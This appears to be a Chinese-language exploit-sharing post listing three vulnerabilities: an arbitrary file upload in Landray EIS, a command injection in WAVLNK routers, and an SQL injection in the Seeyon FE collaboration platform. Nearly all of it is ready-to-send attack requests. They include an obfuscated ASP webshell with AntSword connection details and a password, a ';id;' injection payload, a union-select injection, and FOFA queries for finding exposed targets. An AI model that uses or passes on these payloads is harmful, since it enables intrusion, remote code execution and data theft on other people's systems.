蓝凌EIS任意文件上传漏洞
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
exp:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
蚁剑连接地址:/files/editor_img/xxxx.asp(你上传的文件会被时间戳重命名,不过在response里能看到)
密码:111
👍4
WAVLNK路由器rce漏洞
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
Fofa语法:body="firstFlage"
GET /cgi-bin/live_api.cgi?page=abc&id=173&ip=;id; HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9
致远互联FE协作办公平台editflow_manager存在sql注入漏洞
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
noscript="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeContent-Length: 41Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipoption=2&GUID=-1'+union+select+111*222--+
❤1